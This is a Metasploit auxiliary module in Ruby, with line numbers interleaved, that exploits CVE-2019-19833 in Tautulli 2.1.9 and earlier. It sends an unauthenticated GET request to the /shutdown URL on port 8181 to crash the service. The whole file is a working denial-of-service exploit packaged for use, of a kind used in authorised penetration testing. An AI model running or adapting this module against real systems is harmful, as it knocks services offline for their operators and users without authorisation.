1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize
10
    super(
11
      'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
12
      'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
13
      'Author' => 'Ismail Tasdelen',
14
      'License' => MSF_LICENSE,
15
      'References' => [
16
        ['CVE', '2019-19833'],
17
        ['EDB', '47785']
18
      ],
19
      'Notes' => {
20
        'Stability' => [CRASH_SERVICE_DOWN],
21
        'SideEffects' => [],
22
        'Reliability' => []
23
      }
24
    )
25
    register_options([ Opt::RPORT(8181) ])
26
  end
27

28
  def run
29
    res = send_request_raw({
30
      'method' => 'GET',
31
      'uri' => '/shutdown'
32
    })
33

34
    if res
35
      print_status("Request sent to #{rhost}")
36
    else
37
      print_status("No reply from #{rhost}")
38
    end
39
  rescue Errno::ECONNRESET
40
    print_status('Connection reset')
41
  end
42
end
43

44